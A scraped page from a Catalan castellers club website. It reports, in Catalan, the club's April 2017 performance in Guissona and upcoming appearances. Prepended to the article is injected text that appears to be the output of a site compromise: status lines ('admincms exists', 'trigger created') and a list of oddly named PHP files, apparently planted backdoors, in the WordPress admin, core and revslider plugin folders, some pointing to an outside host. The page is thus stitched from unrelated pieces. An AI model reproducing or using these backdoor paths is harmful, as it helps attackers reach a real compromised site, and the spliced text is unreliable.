Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?stream https://castellersdeberga.cat/wp-admin/ms-upgrade-network-stream-private-core-meta-cron-meta.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/user/admin-cron-stream-private-cron-private.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-filesystem-base-core-ajax.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-meta-private-ajax-stream-meta.php https://castellersdeberga.cat/wp-content/plugins/revslider/revslider-cron-private-ajax-cron-core.php https://castellersdeberga.cat/wp-includes/widgets/class-wp-widget-text-wp-core-private-stream.php https://castellersdeberga.cat/wp-includes/Requests/IDNAEncoder-private-stream.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Actuació a Guissona
 

Actuació a Guissona


Actuació a GuissonaDissabte 22 d’abril de 2017, els Castellers de Berga hem actuat a Guissona, a la comarca de la Segarra. És la tercera vegada que els berguedans actuem a Guissona: ho vam fer el 17 de març de 2013 i el 26 d’abril de 2015. Aquest 2017 ho hem fet en motiu del 10è aniversari de la colla local, els Margeners de Guissona. També hem compartit plaça amb els Castellers de l’Alt Maresme.

Hem començat l’actuació a Guissona, amb dos pilars de 4 i, seguidament, hem descarregat un 5 de 6, un 3 de 7 i un 4 de 6 amb agulla. Hem tancat la diada descarregant un pilar de 5, amb una alineació nova al tronc. Una bona actuació, lluny de casa, pensant també amb la doble actuació del cap de setmana següent.
Els Margeners han descarregat el 4 de 7, el 3 de 7 i el 5 de 6. No ha sigut un bon dia per als del Maresme ja que han sortit de plaça amb 2 caigudes i només un castell descarregat: el 4 de 6.
El cap de setmana llarg del 29, 30 d’abril i 1 de maig no fem pont i doblem actuació. Per una banda, el diumenge 30 d’abril, a les 5 de la tarda, serem a la Fira de Primavera de Navàs. Ens hi acompanyaran els Castellers de Figueres. I dilluns 1 de maig, a les 12 del migdia a la Plaça Doctor Saló de Berga, actuarem amb els Castellers de Terrassa, exactament 5 anys després de la nostra presentació en públic alçant pilars de 4.